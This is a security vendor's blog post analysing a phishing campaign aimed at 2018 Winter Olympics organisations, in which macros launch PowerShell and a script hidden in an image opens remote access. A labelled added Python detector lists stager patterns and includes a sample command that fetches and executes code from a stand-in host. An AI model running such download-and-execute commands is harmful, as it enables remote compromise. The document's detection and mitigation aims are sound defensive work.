Barkly vs Malware
Jonathan Crowe
Jan 2018

2018 Winter Olympics Malware Campaign Evades Antivirus

Malicious emails disguised as alerts from South Korea's National Counter-Terrorism Center are using a new fileless trick to take control over infected machines.

Researchers at McAfee are reporting a new malware campaign targeting organizations associated with the upcoming 2018 Winter Olympics in Pyeongchang, South Korea. The attack is being delivered via emails disguised to look like alerts from the country's National Counter-Terrorism Center (NCTC), with malicious Word documents attached.

Experts expect Olympics-themed attacks like these to ramp up as we get closer to the Winter Olympics' February 9 start date. What makes this campaign truly notable, however, is its use of a brand-new PowerShell tool called Invoke-PSImage that allows attackers to hide malicious scripts inside otherwise benign-looking image files (a technique known as steganography). By hiding malicious code in this way, attackers can sneak it past many of the security solutions companies have in place. That's because a scanner that simply inspects the image file sees a valid PNG, not a script.

The good news is there are steps companies can take to mitigate this threat. Feel free to skip ahead to find out what those are. Otherwise, let's take a closer look at the campaign and the use of Invoke-PSImage in action. 

The campaign's malicious emails and Word doc attachments

According to McAfee researchers, this particular campaign began on December 22, 2017 and continued through December 28. Emails were sent to several organizations with ties to the Pyeongchang Olympics and appeared to come from info@nctc.go.kr, South Korea's National Counter-Terrorism Center (NCTC). Attached to the email was a Microsoft Word document with a file name that translates to "Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics."

When downloaded and opened, the document (written in Korean) informs the reader they need to enable content in order for the document to be properly opened in their version of Word. 

Fake counter-terror alert attached to emails targeting organizations associated with the 2018 Winter Olympics

Enabling content activates an obfuscated Visual Basic macro embedded in the Word document. That, in turn, launches a PowerShell script that downloads the image file below:

Attackers have hidden yet another malicious script inside that image using an open source PowerShell module called Invoke-PSImage. As the McAfee researchers pointed out, what makes this especially troubling is that Invoke-PSImage had been publicly available for less than a week before attackers began using it in this campaign.

That underscores just how quickly attackers are able to adapt and incorporate new attack tools and exploits into their campaigns. 

Using Invoke-PSImage to hide malicious scripts in plain sight

Before we explain how Invoke-PSImage works, it's worth pointing out that the module appears to have been built as a penetration testing tool with perfectly legitimate use cases. Unfortunately, as this malware campaign shows, criminals clearly don't hesitate to put such tools to malicious use.

That said, here are the basic details:

  • What Invoke-PSImage is: An open source PowerShell module.
  • What it does: Allows you to embed a PowerShell script in the pixels of a PNG file and later execute it by running it directly from memory rather than writing it to disk.
  • Why that's dangerous: Not only does hiding the script inside an image file help it evade detection, executing it directly from memory is a fileless technique that generally won't get picked up by antivirus solutions.
  • No download necessary: Invoke-PSImage can be used to extract scripts from downloaded images or images hosted on the web. That means an attacker doesn't necessarily need to download an image onto a machine in order to get a script embedded inside it to run on that machine. 

In the case of this particular malware campaign, the image file is downloaded to the victim machine. Once extracted, the embedded script is passed to the Windows command line and executed via PowerShell. 

McAfee researchers note that the script is heavily obfuscated, but "because the obfuscation makes use of native functions in PowerShell, the script can run in an obfuscated state and work correctly."

Based on their analysis, it appears the objective of the script is to establish an encrypted channel to the attacker's server that allows them to remotely execute commands and/or install additional malware.

Why this attack spells trouble for AVs

This campaign is another example of just how important it is to have mitigations and protection in place that block attacks before they get past the initial delivery stage. Once that stage is complete, attackers have become increasingly good at "living off the land" — abusing legitimate tools like PowerShell that are already present on the system in order to carry out post-exploitation activities without being noticed.

In the past, we've seen many attacks abusing PowerShell follow a tried-and-true pattern:

Spam email with Word attachment > Word attachment with embedded macro > Macro launches PowerShell script > PowerShell script downloads and executes malware payload

In these scenarios, traditional antivirus solutions have a chance of scanning and blocking the attack, but not until the very last step. Once the malware payload has been downloaded onto the device the AV might be able to block it, but only if the malware has been seen before and the AV has a signature it can refer to in order to identify it. In these scenarios, we've seen plenty of instances where the AV misses and the infection is successful.

This malware campaign presents an even worse scenario in which the AV doesn't have the opportunity to do anything at all:

Spam email with Word attachment > Word attachment with embedded macro > Macro launches PowerShell script > PowerShell script extracts 2nd PowerShell script from image and executes it from memory > In-memory executed script gives attacker remote access and control

With no malicious executable file to scan, this attack will slip past AV solutions and be successful unless other protections are in place. 

Blocking script-based attacks that AVs miss

To prevent attacks like this from doing damage, Barkly focuses on stopping them at the earliest opportunity. In this case, because Barkly's ProtectIQ engine provides protection against malicious macros and scripts, it's able to stop the attack as soon as it sees the malicious macro attempting to launch PowerShell from Word.

That means Invoke-PSImage never even comes into play.

But let's say an attack was able to progress to the point where it could leverage Invoke-PSImage. Barkly would still provide protection against a wide variety of malicious PowerShell scripts, thanks to its behavior-based rules that block malicious activity (we confirmed this firsthand by using Invoke-PSImage to embed and extract a variety of malicious scripts on our testing machines).
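As an added example (not from the article and not Barkly's own code), here is a small Python detector for the step described above: an Office application launching PowerShell or another script host, scored together with the command-line traits typical of fileless stagers. The key=value log format and all sample events are constructed; the field names only mimic Sysmon Event ID 1.

```python
import re
# Added example: flag the macro -> PowerShell step on a process-creation feed.
# Field names mimic Sysmon Event ID 1; the log format and events are constructed.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Command-line traits typical of fileless PowerShell stagers (matched on lowercased text).
SUSPICIOUS_ARGS = [
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden"),
    ("encoded_command", r"-e(?:c|nc|ncodedcommand)?\s+[a-z0-9+/=]{8,}"),
    ("exec_bypass", r"-ex(?:ec|ecutionpolicy)?\s+bypass"),
    ("web_download", r"downloadstring|downloadfile|invoke-webrequest|net\.webclient"),
    ("in_memory_exec", r"\biex\b|invoke-expression"),
]

def parse_event(line):
    """Parse 'Key=Value | Key=Value' (our constructed log format) into a dict."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields
def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
def classify(fields):
    """Office app spawning a script host is 'high' by itself; a script host
    showing two or more stager traits is 'medium'; anything else is None."""
    parent = basename(fields.get("ParentImage", ""))
    child = basename(fields.get("Image", ""))
    cmd = fields.get("CommandLine", "").lower()
    traits = [name for name, pat in SUSPICIOUS_ARGS if re.search(pat, cmd)]
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        return "high", [f"{parent} spawned {child}"] + traits
    if child in SCRIPT_HOSTS and len(traits) >= 2:
        return "medium", traits
    return None, traits
def detect(lines):
    alerts = []  # (severity, child image, reasons) for each event worth alerting on
    for line in lines:
        fields = parse_event(line)
        severity, reasons = classify(fields)
        if severity:
            alerts.append((severity, basename(fields.get("Image", "")), reasons))
    return alerts

SAMPLE_EVENTS = [  # constructed sample events, not real logs
    "ParentImage=C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE | Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | CommandLine=powershell -NoP -W Hidden -Exec Bypass -C \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/pic.png')\"",
    "ParentImage=C:\\Windows\\explorer.exe | Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | CommandLine=powershell -NoProfile -Command Get-Process",
    "ParentImage=C:\\Windows\\explorer.exe | Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | CommandLine=powershell -w hidden -enc QUFBQUFBQUFBQUFB",
    "ParentImage=C:\\Program Files\\Microsoft Office\\Office16\\OUTLOOK.EXE | Image=C:\\Windows\\System32\\cmd.exe | CommandLine=cmd.exe /c dir",
]
```

Running `detect(SAMPLE_EVENTS)` flags the Word and Outlook children as high, the hidden encoded PowerShell as medium, and leaves the administrator's Get-Process call alone.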

In addition to using Barkly, there are three more things companies can do to mitigate their risk:

  • Remind employees not to open email attachments from senders they don't know: They should be especially wary of Word documents that ask them to enable content/macros.
  • Better yet, enforce stricter macro controls: For starters, consider blocking macros in Office files downloaded from the Internet.
  • Disable or restrict PowerShell: If PowerShell isn't being used for something vital on a machine, disable it. If it is being used for something vital, consider using PowerShell Constrained Language Mode. That will limit PowerShell to its most basic functionality and make many fileless attack techniques unusable. 

For more tips on preventing and mitigating advanced fileless attacks, download our Fileless Attack Checklist. 

Jonathan Crowe

Jonathan covers the latest threats and cybersecurity trends from a practical point of view.
